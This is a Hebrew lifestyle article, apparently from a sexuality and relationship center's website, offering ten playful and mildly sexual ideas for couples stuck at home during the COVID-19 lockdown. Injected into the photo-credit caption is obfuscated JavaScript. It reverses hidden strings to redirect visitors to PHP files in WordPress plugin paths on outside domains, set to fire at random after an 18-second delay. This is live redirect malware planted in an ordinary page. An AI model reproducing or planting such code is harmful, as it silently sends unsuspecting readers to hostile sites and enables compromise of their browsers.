fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

10 רעיונות לכיף זוגי בזמן קורונה

נמצאים בבית וכבר משתעממים ביחד? צופים בחדשות עצבניים? נטולי אנרגיות? לפי כל הנתונים הסגר הזה לא הולך להסתיים בימים הקרובים, זה אומר יותר ביחד ויותר לחץ ואי ודאות. רעיונות לכיף זוגי יכולים להעביר את הזמן ולשפר את אורח החיים
רעיונות לכיף זוגי | צילום: shutterstock
רעיונות לכיף זוגי | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

ליהנות יותר ביחד טוב לחיזוק המערכת החיסונית ומעולה לאנרגיות החיוביות ביניכם שמשפיעות על כל הבית.

קבלו 10 רעיונות לכיף זוגי שכדאי לממש, אולי כבר הערב
מאת סיגל צוקר – "כחול" המרכז למיניות וזוגיות

רגע לפני:

• מצאו את הזמן המתאים ביותר לכם בזמנים אלו, רעיונות לכיף זוגי טובים לביצוע בין לבין וחלק אחרי שהילדים הולכים לישון.
• עצם ההתכווננות לזמן זוגי היא מדליקה, חשוב שתזכרו שאתם לא רק "אבא" "אמא" אלא גם בני זוג, מאהבים.
• דווקא בגלל שאי אפשר לצאת מהבית – פנקו את עצמכם בזמן הזה, השקיעו באווירה, מוסיקה, יין, נרות, עשו לכם חדר מיטות סקסי, לא "רק לשינה".
• הגישה המנצחת: להיות יצירתיים ולמקסם את הזמן הזה ביחד!

1. אני אוהב/ת אותך

גם זוגות אוהבים זקוקים לתזכורת, בטח בתקופה לא שגרתית כזו. מילה חמה, שיתוף, פרגון, ליטוף, הבעת הערכה, נשיקה אמתית, חיבוק שמראה כמה אנחנו אוהבים כשכבר כמעט שכחנו, כל אלו עושים נפלאות למצב הרוח והופכים אותנו לאנשים טובים, בריאים, מחויכים וטובים לסביבה.

המשימה: להגיד אחד/ת לשני/ה אני אוהב/ת אותך לפחות 10 פעמים ביום, חמש מהן – מבלי לדבר. יש הרבה דרכים להגיד בלי לדבר וכאן המקום לבטא את היצירתיות שלכם.

רעיונות לכיף זוגי : מיסרון, שיר, פתק, לכתוב עם ליפסטיק/קצף גילוח על המראה, או על הגוף במקום מפתיע.

2. בשביל ליהנות יותר ביחד, קראו ביחד

כן, קראו ביחד ספרי פנטזיות, סיפורים ארוטיים שמדליקים את הדמיון. יש שפע של ספרים ארוטיים דיגיטליים ברשת, החיפוש עצמו יכול להיות מעניין ומלהיב בזוג. אפשר לקבל השראה מסיפורי פנטזיות של אחרים – 101 פנטזיות.

דברו על זה, לפעמים רעיונות של אחרים יכולים ללמד אתכם הרבה על עצמכם ולאפשר לכם להיות פתוחים, לשוחח בלי ביקורת.

3. רעיונות לכיף זוגי : משחק הנשיקות

קחו חבילת קלפים, אחד מבני הזוג מושך קלף מבלי לדעת איזה קלף. המספר שיוצא זה מספר הנשיקות שתצטרכו להחליף במהלך היום הקרוב. נשיקות אמיתיות, שתי דקות לפחות בכל פעם.

נשיקה היא דבק אינטימי, מעורר וחושני (אם עושים אותה כמו שצריך כמובן….). נשקו כמו שצריך… כמובן שזה לא חייב להסתיים בכך.

4. עסו באהבה

זמן לחוץ עכשיו, זה הזמן לקבוע ערב שאתם מעניקים עיסוי וערב שאתם מקבלים. העיסוי הוא דרך נהדרת לשחרר ולהשתחרר וגם ליהנות ממגע וקירבה.

אפשר להתחיל בעיסוי הגב בעדינות, לשחרר קלות את השרירים המכווצים, נגיעות עדינות בשריר התפוס ובמקביל, פזרו נשיקות קטנות ואוהבות על כל אזור הכתפיים, גלשו קצת לגב, קצת לצוואר… בנינוחות, לא כי אתם בטוחים שזה יוביל למיטה – אלא פשוט כי אתם רוצים לעשות טוב ונעים. מהנשיקות האלו אפשר לעבור לנשיקה רכה ואוהבת על השפתיים – הכל באהבה, הכל בסבלנות. לפנק. לפנק. לפנק.

אפשר כמובן להוסיף לעיסוי חמאת שיאה, או שמן ואם בן/בת הזוג נרדמים תוך כדי, לא לכעוס, תיהנו מזה שעשיתם טוב (ממש!), שהתור שלכם יגיע ושיש לכם בני זוג אסירי תודה מחר.

5. היבדקו

אין זמן יותר מתאים מאשר עכשיו לוודא שאתם בריאים. אם בד"כ אתם נכנסים לחדר המיטות ומתפשטים לפני שנכנסים מתחת לשמיכה, הגיע הזמן להתלבש. רופא ומטופלת או ההיפך, תלוי מי רוצה יותר, אם לא עכשיו, אז מתי???

התלבשו בהתאם לתפקיד והתחילו בבדיקה, כמובן שאסור להזניח אזורים אסטרטגיים. מותר למטופל/ת להתלונן/לספר איפה כואב כמובן והמטפל/ת בודק/ת אותו ומטפל/ת בו בעדינות או דווקא בקשיחות…. אתם תחליטו. משחקי תפקידים יכולים להצחיק/להביך/להסעיר/לרגש – תתפרעו.

6. שחקו

אחד הדברים שזוגות פחות ופחות עושים ביחד זה לשחק, פשוט לשחק – בשביל ליהנות. אתם יכולים לשחק משחקי קלפים, מלחמת כריות, טוויסטר, אמת וחובה, סטריפ פוקר ואפילו מלחמה.

התקשורת היומיומית היא כל כך מתישה – כל כך כיף לשחק, לצאת לרגע מהלחץ, להשתחרר ולצחוק ביחד .

7. נגיד ש…

נגיד שלא הייתה קורונה עכשיו, מה הייתם עושים? עכשיו זה זמן מעולה לתכנן, לאן אתם רוצים שהזוגיות שלכם תגיע ומה עוד בא לכם לעשות ביחד.

"נגיד שלא הייתה קורונה, הייתי רוצה להיות על החוף איתך בתאילנד" ממממ אולי אפשר להכין קוקטייל וקצת אננס ולשכב במיטה ביחד ולראות איך אתם גורמים לזה לקרות? עכשיו יש זמן לשתף, לדבר, לתכנן, לפנטז – לעבוד יד ביד ולא ראש בראש ולהגביר את הסיכוי למימוש.

8. הביאו את החשק עם משחק מקדים

יש פחות חשק לסקס עכשיו? כדאי שתדעו – ככל שתעשו פחות סקס, תרצו פחות סקס, אז תכניסו את זה ללו"ז, דברו ושתפו את בני הזוג כמה מתאים לכם עכשיו, אל תשאירו את זה למשחק ניחושים (שיכול לעורר הרגשה של דחיה אצל בני הזוג). לא בא לכם עכשיו? תגידו מתי כן.
כדאי להתחיל את המשחק המקדים כבר בבוקר. שימו לב – משחק מקדים אמיתי משמעו להביא את בן/בת הזוג למצב הרוח הנכון. לא בטכניקה אלא בהתכווננות.
תחשבו: מה גורם לבן/בת הזוג להרגיש סקסי/ת? נחשק/ת? אהוב/ה?
תנו להם להרגיש ככה, מהבוקר.

9. תעשו משהו חדש

כן, השגרה כבר לא פה, זה הזמן המושלם להעז קצת יותר, גם אם אי אפשר לצאת מהבית. כנסו לחנות, בחרו ביחד והזמינו חבילת אהבה זוגית שובבה, לחוויות בלתי נשכחות – במשלוח עד הבית.

החליטו על תורות: בחרו ערב אחד שאת אחראית על ההפקה וערב אחד שאתה אחראי – הפתיעו ביוזמות. חפשו אצלנו באתר, במאמרים ובטיפים, יש מאות משחקים ורעיונות מפתיעים.

10. שחקו משחקים סקסיים ונועזים

אספנו לכם, הזוגות הנועזים, שמחפשים רעיונות למשחקים סקסיים במיטה עוד 10 משחקי סקס לזוגות. הצטיידו במצב רוח ובראש כחול.
כנסו: משחקי סקס – 10 משחקים לזוגות

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות